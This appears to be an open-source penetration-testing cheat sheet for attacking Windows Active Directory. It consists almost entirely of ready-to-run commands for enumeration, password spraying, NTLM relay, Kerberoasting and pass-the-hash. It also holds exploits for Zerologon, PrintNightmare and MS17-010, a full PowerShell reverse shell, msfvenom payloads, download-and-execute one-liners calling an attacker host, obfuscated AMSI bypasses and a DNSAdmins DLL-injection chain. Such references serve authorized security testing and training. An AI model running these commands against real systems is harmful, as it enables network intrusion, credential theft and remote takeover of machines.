Onyx is open source. Contribute commands, improve notes, and help turn the repo into a sharper field reference.

# Variables (define once)
export IP=10.10.10.10
export SUBNET=10.10.10.0/24
export DOMAIN=domain.local
export DC=DC01.domain.local

# Host discovery (no port scan)
nmap -sn $SUBNET -oG alive_hosts.txt
nmap -sn $SUBNET --open | grep "Nmap scan report" | awk '{print $5}'

# Quick top 1000 port scan
nmap -sC -sV -O 10.10.10.10 -oA nmap_initial

# Full all ports scan (slow but thorough)
nmap -p- --min-rate 5000 10.10.10.10 -oA nmap_allports

# Aggressive scan (OS + Version + Scripts + Traceroute)
nmap -A -T4 10.10.10.10 -oA nmap_aggressive

# UDP scan (top 20 UDP ports)
nmap -sU --top-ports 20 10.10.10.10

# Main AD ports
nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,5986,9389,49152-65535 \
     -sC -sV -O 10.10.10.10 -oA nmap_ad_full

# Full network scan to identify DCs
nmap -p 88,389,636,3268 --open $SUBNET -oG dcs.txt
grep "open" dcs.txt | awk '{print $2}'

# SMB
nmap -p 445 --script smb-os-discovery 10.10.10.10
nmap -p 445 --script smb-enum-users 10.10.10.10
nmap -p 445 --script smb-enum-shares 10.10.10.10
nmap -p 445 --script smb-enum-domains 10.10.10.10
nmap -p 445 --script smb-enum-sessions 10.10.10.10
nmap -p 445 --script smb-enum-processes 10.10.10.10
nmap -p 445 --script smb-ls --script-args smb-ls.shares=C$ 10.10.10.10
nmap -p 445 --script smb2-security-mode 10.10.10.10
nmap -p 445 --script smb-security-mode 10.10.10.10
nmap -p 445 --script smb-protocols 10.10.10.10
# SMB vulnerability scan
nmap -p 445 --script smb-vuln-ms17-010 10.10.10.10
nmap -p 445 --script smb-vuln-ms08-067 10.10.10.10
nmap -p 445 --script smb-vuln-regsvc-dos 10.10.10.10
nmap -p 445 --script "smb-vuln*" 10.10.10.10

# LDAP
nmap -p 389 --script ldap-rootdse 10.10.10.10
nmap -p 389 --script ldap-search --script-args 'ldap.base="dc=domain,dc=local"' 10.10.10.10
nmap -p 389,636 --script ldap-search \
     --script-args 'ldap.username="CN=user,DC=domain,DC=local",ldap.password=pass,ldap.base="DC=domain,DC=local"' 10.10.10.10

# Kerberos
nmap -p 88 --script krb5-enum-users \
     --script-args krb5-enum-users.realm="domain.local",userdb=/usr/share/seclists/Usernames/Names/names.txt 10.10.10.10

# RPC
nmap -p 135 --script msrpc-enum 10.10.10.10

# WinRM
nmap -p 5985,5986 --script http-auth-finder 10.10.10.10
nmap -p 5985 --script http-winrm-info 10.10.10.10

# RDP
nmap -p 3389 --script rdp-enum-encryption 10.10.10.10
nmap -p 3389 --script rdp-ntlm-info 10.10.10.10
nmap -p 3389 --script rdp-vuln-ms12-020 10.10.10.10
nmap -p 3389 --script "rdp-*" 10.10.10.10

# DNS
nmap -p 53 --script dns-zone-transfer --script-args dns-zone-transfer.domain=domain.local 10.10.10.10
nmap -p 53 --script dns-brute --script-args dns-brute.domain=domain.local 10.10.10.10
nmap -p 53 --script dns-recursion 10.10.10.10
nmap -p 53 --script dns-service-discovery 10.10.10.10

# MSSQL
nmap -p 1433 --script ms-sql-info 10.10.10.10
nmap -p 1433 --script ms-sql-config 10.10.10.10
nmap -p 1433 --script ms-sql-empty-password 10.10.10.10
nmap -p 1433 --script ms-sql-ntlm-info 10.10.10.10
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args "mssql.username=sa,mssql.password=,ms-sql-xp-cmdshell.cmd=whoami" 10.10.10.10

# HTTP/HTTPS
nmap -p 80,443,8080,8443 --script http-title,http-headers,http-server-header 10.10.10.10
nmap -p 80,443 --script http-vuln-cve2017-5638 10.10.10.10
nmap -p 80,443 --script "http-auth*" 10.10.10.10

# Full AD All Scripts
nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,1433 \
     --script smb-enum-shares,smb-enum-users,ldap-rootdse,ldap-search,\
krb5-enum-users,smb-os-discovery,smb-vuln-ms17-010,smb-enum-domains,\
smb-enum-sessions,smb2-security-mode,msrpc-enum,rdp-enum-encryption,\
rdp-ntlm-info,ssl-cert,ms-sql-info,smb-protocols \
     10.10.10.10 -oA nmap_full_ad

# Slow scan (avoid detection)
nmap -T1 -p 445,389,88 10.10.10.10
nmap -T2 -p 445,389,88 10.10.10.10
nmap --scan-delay 5s 10.10.10.10

# Packet fragmentation
nmap -f 10.10.10.10
nmap -ff 10.10.10.10
nmap --mtu 16 10.10.10.10

# Decoys (mask source)
nmap -D RND:10 10.10.10.10
nmap -D 192.168.1.5,192.168.1.6,ME 10.10.10.10

# Source spoofing (requires low-level network access)
nmap -S 192.168.1.100 -e eth0 10.10.10.10

# Source port firewall bypass
nmap --source-port 53 10.10.10.10
nmap --source-port 88 10.10.10.10

# Scan via proxy
nmap --proxies socks4://127.0.0.1:9050 10.10.10.10

# Slow + fragmentation + decoys
nmap -T2 -f -D RND:5 --source-port 88 -p 445,389,88,3389 10.10.10.10

# Network discovery
netexec smb $SUBNET
netexec smb $SUBNET --gen-relay-list relay_targets.txt

# SMB Null Session
netexec smb 10.10.10.10 -u '' -p '' --shares
netexec smb 10.10.10.10 -u '' -p '' --users
netexec smb 10.10.10.10 -u '' -p '' --groups
netexec smb 10.10.10.10 -u 'guest' -p '' --shares

# SMB with credentials
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' --shares
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' --sessions
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' --loggedon-users
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' --pass-pol
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' --local-groups
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' --computers
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' --rid-brute

# LDAP
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd' --users
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd' --groups
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd' --password-not-required
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd' --admin-count
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd' --trusted-for-delegation
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd' -M get-desc-users
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd' -M ldap-signing
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd' -M adcs
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd' -M laps
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd' -M maq
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd' -M find-delegation

# WinRM
netexec winrm 10.10.10.10 -u administrator -p 'P@ssw0rd'
netexec winrm $SUBNET -u administrator -p 'P@ssw0rd'

# RDP
netexec rdp 10.10.10.10 -u administrator -p 'P@ssw0rd'
netexec rdp $SUBNET -u administrator -p 'P@ssw0rd'

# MSSQL
netexec mssql $SUBNET -u '' -p ''
netexec mssql 10.10.10.10 -u sa -p '' --local-auth
netexec mssql 10.10.10.10 -u administrator -p 'P@ssw0rd' --local-auth -q "SELECT name FROM sys.databases;"

# Command execution
netexec smb 10.10.10.10 -u admin -p 'P@ssw0rd' -x "whoami"
netexec smb 10.10.10.10 -u admin -p 'P@ssw0rd' -X "whoami"
netexec winrm 10.10.10.10 -u admin -p 'P@ssw0rd' -x "whoami"
netexec mssql 10.10.10.10 -u sa -p 'P@ssw0rd' -x "whoami"

# Useful modules
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' -M gpp_password
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' -M gpp_autologin
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' -M ms17-010
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' -M bluekeep
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' -M spider_plus
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' -M zerologon
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' -M petitpotam
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' -M nopac
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' -M printerbug

# Full enumeration
enum4linux-ng -A 10.10.10.10 -oA enum4linux_output
enum4linux-ng -A 10.10.10.10
enum4linux -a 10.10.10.10

# Specific options
enum4linux -U 10.10.10.10
enum4linux -G 10.10.10.10
enum4linux -S 10.10.10.10
enum4linux -P 10.10.10.10
enum4linux -i 10.10.10.10
enum4linux -r 10.10.10.10
enum4linux -R 500-1200 10.10.10.10

rpcclient -U "" -N 10.10.10.10
rpcclient -U "domain.local\administrator%P@ssw0rd" 10.10.10.10

# Inside rpcclient
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> enumalsgroups domain
rpcclient $> querydominfo
rpcclient $> getdompwinfo
rpcclient $> querydispinfo
rpcclient $> queryuser 0x1f4
rpcclient $> querygroup 0x200
rpcclient $> queryusergroups 0x1f4
rpcclient $> lookupnames administrator
rpcclient $> lsaquery
rpcclient $> lsaenumsid
rpcclient $> dsroledominfo

# RID brute-force (find all users)
for i in $(seq 500 1200); do
  result=$(rpcclient -U "" -N 10.10.10.10 -c "queryuser $(printf '0x%x' $i)" 2>/dev/null | grep "User Name")
  [ -n "$result" ] && echo "RID $i: $result"
done

# Test anonymous bind
ldapsearch -H ldap://10.10.10.10 -x -s base namingcontexts
ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local" "(objectClass=*)" | head -100

# Full dump
ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local" "(objectClass=administrator)" \
           sAMAccountName givenName sn description memberOf userAccountControl pwdLastSet | \
           tee ldap_users.txt

ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local" "(objectClass=group)" \
           cn member distinguishedName | tee ldap_groups.txt

# Search for passwords in descriptions
ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local" \
           "(description=*pass*)" sAMAccountName description

# Find accounts without Kerberos pre-auth
ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local" \
           "(&(objectClass=administrator)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" sAMAccountName

# Find accounts with SPN (Kerberoastable)
ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local" \
           "(&(objectClass=administrator)(servicePrincipalName=*))" sAMAccountName servicePrincipalName

# With credentials
ldapsearch -H ldap://10.10.10.10 -D "domain.local\administrator" -w 'P@ssw0rd' \
           -b "DC=domain,DC=local" "(objectClass=administrator)" sAMAccountName description

# ldapdomaindump (HTML + JSON output)
ldapdomaindump -u "domain.local\administrator" -p 'P@ssw0rd' ldap://10.10.10.10 -o /tmp/ldap_dump/
firefox /tmp/ldap_dump/domain_users.html

# User enumeration
kerbrute userenum -d domain.local --dc 10.10.10.10 \
         /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt \
         -o valid_users.txt -t 50

kerbrute userenum -d domain.local --dc 10.10.10.10 \
         /usr/share/seclists/Usernames/Names/names.txt \
         -o valid_users.txt

# With custom wordlist (first.last format)
kerbrute userenum -d domain.local --dc 10.10.10.10 users_custom.txt -o valid_users.txt --downgrade

# P@ssw0rd spray (CHECK POLICY FIRST!)
kerbrute passwordspray -d domain.local --dc 10.10.10.10 valid_users.txt 'Welcome1!'
kerbrute passwordspray -d domain.local --dc 10.10.10.10 valid_users.txt 'Password2024!'
kerbrute passwordspray -d domain.local --dc 10.10.10.10 valid_users.txt 'Spring2025@'
kerbrute passwordspray -d domain.local --dc 10.10.10.10 valid_users.txt "domain.local" --delay 3000

# Targeted brute force
kerbrute bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt targetuser

# Generate usernames from a name list
# Format: first.last, flast, firstl, etc.
username-anarchy -f users.txt --format first.last > usernames_fl.txt
username-anarchy -f users.txt --format flast > usernames_fl2.txt

# Manual generation
awk '{print tolower($1"."$2)}' names.txt > usernames.txt
awk '{print tolower(substr($1,1,1)$2)}' names.txt
awk '{print tolower($1)}' names.txt

# ALWAYS check password policy FIRST
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd --pass-pol
enum4linux -P 10.10.10.10
rpcclient -U "" -N 10.10.10.10 -c "getdompwinfo"

# CrackMapExec / NetExec spray (one password at a time!)
netexec smb 10.10.10.10 -u valid_users.txt -p 'Welcome1!' --continue-on-success
netexec smb 10.10.10.10 -u valid_users.txt -p 'Password2024!' --continue-on-success
netexec ldap 10.10.10.10 -u valid_users.txt -p 'Welcome1!' --continue-on-success

# Multi-password spray WITHOUT lockout (1:1 ratio)
netexec smb 10.10.10.10 -u users.txt -p passwords.txt --no-bruteforce --continue-on-success

# Spray local accounts
netexec smb $SUBNET -u administrator -p 'Welcome1!' --local-auth --continue-on-success

# Analyze network (passive mode, nothing is sent)
sudo responder -I eth0 -A

# Active mode (responds to LLMNR/NBT-NS requests)
sudo responder -I eth0 -wdPv

# Responder + SMB disabled (for relay)
# Edit /etc/responder/Responder.conf: SMB = Off, HTTP = Off
sudo nano /etc/responder/Responder.conf
sudo responder -I eth0 -wd

# View captured hashes
cat /usr/share/responder/logs/SMB-NTLMv2-SSP-10.10.10.10.txt
ls /usr/share/responder/logs/

# NTLMv2 (mode 5600)
hashcat -m 5600 ntlmv2_hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 5600 ntlmv2_hashes.txt rockyou.txt --rules-file best64.rule
hashcat -m 5600 ntlmv2_hashes.txt rockyou.txt -r OneRuleToRuleThemAll.rule
john --format=netntlmv2 --wordlist=rockyou.txt ntlmv2_hashes.txt

# NTLMv1 (mode 5500) - rarer but faster to crack
hashcat -m 5500 ntlmv1_hashes.txt rockyou.txt

# NTHash (mode 1000)
hashcat -m 1000 nthashes.txt rockyou.txt
hashcat -m 1000 nthashes.txt rockyou.txt --rules-file best64.rule

# List targets without SMB signing
nmap -p 445 --script smb2-security-mode $SUBNET | grep -B3 "not required"
netexec smb $SUBNET --gen-relay-list relay_targets.txt

# Basic relay → auto SAM dump
impacket-ntlmrelayx -tf relay_targets.txt -smb2support

# Relay + command execution
impacket-ntlmrelayx -tf relay_targets.txt -smb2support \
                    -c "powershell -enc BASE64REVSHELL"

# Relay + interactive shell
impacket-ntlmrelayx -tf relay_targets.txt -smb2support -i

# Relay → LDAP (add admin administrator)
impacket-ntlmrelayx -t ldap://10.10.10.10 --escalate-administrator compromised_user

# Relay → LDAPS (create computer account)
impacket-ntlmrelayx -t ldaps://10.10.10.10 --add-computer EvilPC --computer-password 'P@ssw0rd!'

# mitm6 + LDAP Relay (IPv6)
sudo mitm6 -d domain.local &
impacket-ntlmrelayx -6 -t ldaps://10.10.10.10 -wh fakewpad.domain.local \
                    --add-computer EvilPC --computer-password 'P@ss!'

# Dump AS-REP hashes
impacket-GetNPUsers domain.local/ -dc-ip 10.10.10.10 -no-P@ssw0rd -usersfile valid_users.txt \
                   -format hashcat -outputfile asrep.hashes

impacket-GetNPUsers domain.local/ -dc-ip 10.10.10.10 -no-P@ssw0rd -request \
                   -usersfile valid_users.txt -outputfile asrep.hashes

# Crack
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 18200 asrep.hashes rockyou.txt -r OneRuleToRuleThemAll.rule
john --format=krb5asrep --wordlist=rockyou.txt asrep.hashes

# Dump TGS tickets (SPNs)
impacket-GetUserSPNs domain.local/administrator:P@ssw0rd -dc-ip 10.10.10.10 -request \
                     -outputfile kerb.hashes

# Targeted
impacket-GetUserSPNs domain.local/administrator:P@ssw0rd -dc-ip 10.10.10.10 -request-administrator svcSQL \
                     -outputfile kerb_sql.hashes

# Crack
hashcat -m 13100 kerb.hashes rockyou.txt
hashcat -m 19700 kerb.hashes rockyou.txt
john --format=krb5tgs --wordlist=rockyou.txt kerb.hashes

# Test credentials on all protocols
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd'
netexec winrm 10.10.10.10 -u administrator -p 'P@ssw0rd'
netexec rdp 10.10.10.10 -u administrator -p 'P@ssw0rd'
netexec mssql 10.10.10.10 -u administrator -p 'P@ssw0rd'
netexec ldap 10.10.10.10 -u administrator -p 'P@ssw0rd'

# Test NTLM hash
netexec smb 10.10.10.10 -u administrator -H NTLMHASH
netexec smb 10.10.10.10 -u Administrator -H NTLMHASH --local-auth
netexec smb $SUBNET -u Administrator -H NTLMHASH --local-auth --continue-on-success

# Check if admin
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' | grep -i "pwn3d\|admin"

# Impacket PsExec → SYSTEM shell
impacket-psexec domain.local/Administrator@10.10.10.10 -hashes :NTLMHASH
impacket-psexec domain.local/administrator@10.10.10.10 -hashes :NTLMHASH

# Impacket smbexec → cmd shell
impacket-smbexec domain.local/Administrator@10.10.10.10 -hashes :NTLMHASH

# Impacket wmiexec → semi-interactive
impacket-wmiexec domain.local/Administrator@10.10.10.10 -hashes :NTLMHASH

# Impacket atexec → exec via scheduler
impacket-atexec domain.local/Administrator@10.10.10.10 -hashes :NTLMHASH "whoami"

# Evil-WinRM → PowerShell shell
evil-winrm -i 10.10.10.10 -u Administrator -H NTLMHASH

# xfreerdp → GUI session
xfreerdp /v:10.10.10.10 /u:Administrator /pth:NTLMHASH /cert-ignore /dynamic-resolution

# psexec → SYSTEM shell via SMBExec (creates a service)
impacket-psexec domain.local/administrator:P@ssw0rd@10.10.10.10
impacket-psexec domain.local/administrator:P@ssw0rd@10.10.10.10 cmd.exe
impacket-psexec domain.local/administrator:P@ssw0rd@10.10.10.10 powershell
impacket-psexec domain.local/administrator@10.10.10.10 -hashes :NTLMHASH

# smbexec → Shell via temporary SMB share (stealthier than psexec)
impacket-smbexec domain.local/administrator:P@ssw0rd@10.10.10.10
impacket-smbexec domain.local/administrator@10.10.10.10 -hashes :NTLMHASH

# wmiexec → Shell via WMI (no service creation, stealthier)
impacket-wmiexec domain.local/administrator:P@ssw0rd@10.10.10.10
impacket-wmiexec domain.local/administrator@10.10.10.10 -hashes :NTLMHASH

# dcomexec → Shell via DCOM
impacket-dcomexec domain.local/administrator:P@ssw0rd@10.10.10.10 -object MMC20
impacket-dcomexec domain.local/administrator:P@ssw0rd@10.10.10.10 -object ShellBrowserWindow

# Check if session is SYSTEM or admin
impacket-psexec domain.local/administrator:P@ssw0rd@10.10.10.10 -c "whoami && whoami /priv"

# evil-winrm (full PowerShell shell)
evil-winrm -i 10.10.10.10 -u administrator -p 'P@ssw0rd'
evil-winrm -i 10.10.10.10 -u administrator -H NTLMHASH
evil-winrm -i 10.10.10.10 -u administrator -p 'P@ssw0rd' -s /opt/scripts/
evil-winrm -i 10.10.10.10 -u administrator -p 'P@ssw0rd' -e /opt/exes/

# Inside evil-winrm:
menu
Invoke-Binary /opt/exes/SharpHound.exe
upload /local/path /remote/path
download C:\loot\hash.txt /local/
bypass-4msi

# Via Impacket
impacket-wmiexec domain.local/administrator:P@ssw0rd@10.10.10.10 -shell-type powershell

# xfreerdp (Linux)
xfreerdp /v:10.10.10.10 /u:administrator /p:'P@ssw0rd' /cert-ignore /dynamic-resolution
xfreerdp /v:10.10.10.10 /u:administrator /p:'P@ssw0rd' /cert-ignore +clipboard /drive:share,/tmp
xfreerdp /v:10.10.10.10 /u:Administrator /pth:NTLMHASH /cert-ignore

# rdesktop
rdesktop -u administrator -p 'P@ssw0rd' 10.10.10.10
rdesktop -u 'domain.local\administrator' -p 'P@ssw0rd' 10.10.10.10

# remmina (GUI)
remmina -c rdp://administrator:P@ssw0rd@10.10.10.10

# impacket-mssqlclient → SQL shell + xp_cmdshell
impacket-mssqlclient domain.local/administrator:P@ssw0rd@10.10.10.10 -windows-auth
impacket-mssqlclient sa:P@ssw0rd@10.10.10.10
impacket-mssqlclient domain.local/administrator@10.10.10.10 -hashes :NTLMHASH -windows-auth

-- Enable xp_cmdshell then get reverse shell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'powershell -enc BASE64_REVERSE_SHELL';

# Via netexec
netexec mssql 10.10.10.10 -u sa -p 'P@ssw0rd' --local-auth -x "whoami"

# Check vulnerability
netexec smb 10.10.10.10 -u administrator -p 'P@ssw0rd' -M printnightmare

# Linux → RCE via DLL
python3 CVE-2021-1675.py domain.local/administrator:P@ssw0rd@10.10.10.10 \
        '\\10.10.14.1\share\evil.dll'

# Windows → Add local admin
.\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "hacker" -NewPassword "P@ssw0rd!"

# After → Connect with the new account
evil-winrm -i 10.10.10.10 -u hacker -p 'P@ssw0rd!'

# Check
nmap -p 445 --script smb-vuln-ms17-010 10.10.10.10
netexec smb 10.10.10.10 -u '' -p '' -M ms17-010

# Metasploit
msfconsole -q
use exploit/windows/smb/ms17_010_psexec
set RHOSTS 10.10.10.10
set LHOST 10.10.14.1
set LPORT 4444
run

# Manual (Impacket)
# Listen: nc -lvnp 4444
python3 zzz_exploit.py 10.10.10.10

# Scan
netexec smb 10.10.10.10 -u '' -p '' -M zerologon
python3 zerologon_tester.py DC_NETBIOS_NAME 10.10.10.10

# Exploit (reset DC machine account password → empty)
python3 cve-2020-1472-exploit.py DC_NETBIOS_NAME 10.10.10.10

# Dump all hashes via secretsdump
impacket-secretsdump -no-P@ssw0rd -just-dc domain.local/DC_NETBIOS_NAME\$@10.10.10.10

# RESTORE THE PASSWORD (important even in lab!)
python3 restorepassword.py domain.local/DC_NETBIOS_NAME@DC_NETBIOS_NAME \
        -target-ip 10.10.10.10 -hexpass ORIGINAL_HEX_PASS

# Prepare the listener
nc -lvnp 4444
rlwrap nc -lvnp 4444

# PowerShell reverse shell (raw command, encode in base64)
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.1",4444);
$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
  $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);
  $sendback = (iex $data 2>&1 | Out-String );
  $sendback2 = $sendback + "PS " + (pwd).Path + "> ";
  $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
  $stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()
};$client.Close()

# Encode in base64 (from Linux)
python3 -c "
import base64
cmd='$client = New-Object System.Net.Sockets.TCPClient(\"10.10.14.1\",4444);...'
enc = base64.b64encode(cmd.encode('utf-16-le')).decode()
print(enc)"

# Launch the encoded shell
powershell -nop -w hidden -enc <BASE64>

# Nishang OneLiners - Load and execute Invoke-PowerShellTcp
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.1/Invoke-PowerShellTcp.ps1')
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.1 -Port 4444

# ConPtyShell (full interactive shell)
# On attacker: stty raw -echo; nc -lvnp 4444
IEX(IWR http://10.10.14.1/Invoke-ConPtyShell.ps1 -UseBasicParsing)
Invoke-ConPtyShell 10.10.14.1 4444

# MSFVenom payloads
# EXE
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe > shell.exe
# Staged (Meterpreter)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe > meter.exe
# DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f dll > evil.dll
# PowerShell (base64)
msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.14.1 LPORT=4444

# Upload and execute
# Simple HTTP server (attacker)
python3 -m http.server 80
python3 -m http.server 8080

# Download from Windows (victim)
certutil -urlcache -f http://10.10.14.1/shell.exe C:\Windows\Temp\shell.exe
powershell -c "Invoke-WebRequest http://10.10.14.1/shell.exe -OutFile C:\Windows\Temp\shell.exe"
powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.14.1/shell.exe','C:\Windows\Temp\shell.exe')"
bitsadmin /transfer job /download /priority high http://10.10.14.1/shell.exe C:\Windows\Temp\shell.exe

# Execute
C:\Windows\Temp\shell.exe
Start-Process C:\Windows\Temp\shell.exe

# Python PTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'

# Full TTY upgrade
# In the basic shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl+Z (suspend)
stty raw -echo; fg
# In the shell:
export TERM=xterm-256color
stty rows 50 columns 200

# rlwrap
rlwrap nc -lvnp 4444

# socat (full TTY from the start)
# Attacker:
socat file:`tty`,raw,echo=0 tcp-listen:4444
# Victim (PowerShell):
socat exec:'cmd.exe',pty,stderr tcp:10.10.14.1:4444

# Who am I?
whoami /all
whoami /priv
net administrator %username% /domain
echo %logonserver%
ipconfig /all
systeminfo
hostname

# Network topology
ipconfig /all
route print
arp -a
netstat -ano
netsh firewall show state

# Quick credential search
dir /s *pass* *cred* *secret* *.config 2>nul
findstr /si "password" *.xml *.ini *.txt *.config 2>nul
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# SharpHound (Windows) - collect all AD data
.\SharpHound.exe -c all --zipfilename bhdata.zip
.\SharpHound.exe -c All,GPOLocalGroup --outputdirectory C:\Windows\Temp\

# Bloodhound-python (from Linux with credentials)
bloodhound-python -d domain.local -dc DC01 -c All \
                  -u administrator -p 'P@ssw0rd' --zip -o /tmp/bh/
bloodhound-python -d domain.local -dc DC01 -c All \
                  -u administrator --hashes :NTLMHASH --zip

# Copy results to attacker
# Via evil-winrm:
download C:\Windows\Temp\bhdata.zip /tmp/bhdata.zip
# Via SMB:
copy C:\Windows\Temp\bhdata.zip \\10.10.14.1\share\

# Import into BloodHound
# Start neo4j and bloodhound
sudo neo4j start
bloodhound &
# Drag and drop the zip into BloodHound

# Load in memory
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.1/PowerView.ps1')

# Quick enumeration
Get-DomainComputer | select dnshostname,operatingsystem
Get-DomainUser | select samaccountname,description,memberof
Get-DomainUser -SPN | select name,serviceprincipalname
Get-DomainUser -PreauthNotRequired | select name
Get-DomainGroupMember "Domain Admins" | select membername
Get-DomainTrust
Find-DomainShare -CheckShareAccess
Find-InterestingDomainAcl -ResolveGUIDs | select IdentityReferenceName,ActiveDirectoryRights,ObjectDN
Get-DomainComputer -Unconstrained | select name
Get-DomainUser -TrustedToAuth | select name,msds-allowedtodelegateto

# Add DC to /etc/hosts
echo "10.10.10.10 DC01.domain.local domain.local" >> /etc/hosts

# Configure Kerberos (Linux)
cat > /etc/krb5.conf << EOF
[libdefaults]
    default_realm = domain.local
    dns_lookup_realm = false
    dns_lookup_kdc = false
[realms]
    domain.local = {
        kdc = 10.10.10.10
        admin_server = 10.10.10.10
    }
[domain_realm]
    .domain.local = domain.local
    domain.local = domain.local
EOF

# Classic bypass
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# Alternative obfuscated bypass
$a=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUtils')
$b=$a.GetField('amsi'+'InitFailed','NonPublic,Static')
$b.SetValue($null,$true)

# Via WLDP
$w=[Ref].Assembly.GetType('System.Management.Automation.WldpNativeMethods')
$f=$w.GetField('_wldpIsScriptFileTrusted','NonPublic,Static')
$f.SetValue($null, $null)

powershell -ep bypass
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.1/shell.ps1')"
# Base64 encoded
$cmd = 'IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.1/ps.ps1")'
$enc = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cmd))
powershell -EncodedCommand $enc

# Load PowerView in memory
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.1/PowerView.ps1')
# Via certutil (proxy bypass)
certutil -urlcache -f http://10.10.14.1/tool.exe C:\Windows\Temp\tool.exe
# Bypass CLM (Constrained Language Mode)
powershell -version 2
$ExecutionContext.SessionState.LanguageMode

# Identify DC via DNS
nslookup -type=SRV _ldap._tcp.dc._msdcs.domain.local
dig SRV _ldap._tcp.dc._msdcs.domain.local
dig _kerberos._tcp.domain.local SRV
dig @10.10.10.10 domain.local AXFR

# Nmap DNS
nmap -p 53 --script dns-zone-transfer --script-args dns-zone-transfer.domain=domain.local 10.10.10.10
nmap -p 53 --script dns-brute --script-args dns-brute.domain=domain.local 10.10.10.10
nmap -p 53 --script dns-recursion 10.10.10.10

# adidnsdump (AD Integrated DNS)
adidnsdump -u domain.local\\administrator -p P@ssw0rd 10.10.10.10
adidnsdump -u domain.local\\administrator -p P@ssw0rd ldap://10.10.10.10 -r

# dnscmd (from Windows - DNS admin required)
dnscmd DC01.domain.local /enumzones
dnscmd DC01.domain.local /enumrecords domain.local .

# 1. Check DNSAdmins group membership
Get-DomainGroupMember "DNSAdmins"
net group "DNSAdmins" /domain

# 2. Create malicious DLL (msfvenom)
msfvenom -p windows/x64/exec cmd='net group "domain admins" hacker /add /domain' -f dll -o evil.dll
# Or reverse shell:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f dll -o evil.dll

# 3. Serve the DLL via SMB (Impacket)
impacket-smbserver share $(pwd) -smb2support

# 4. Configure dnscmd to load the DLL
dnscmd DC01.domain.local /config /serverlevelplugindll \\10.10.14.1\share\evil.dll

# 5. Restart DNS service (requires SeRemoteShutdownPrivilege or DNS admin)
sc \\DC01.domain.local stop dns
sc \\DC01.domain.local start dns
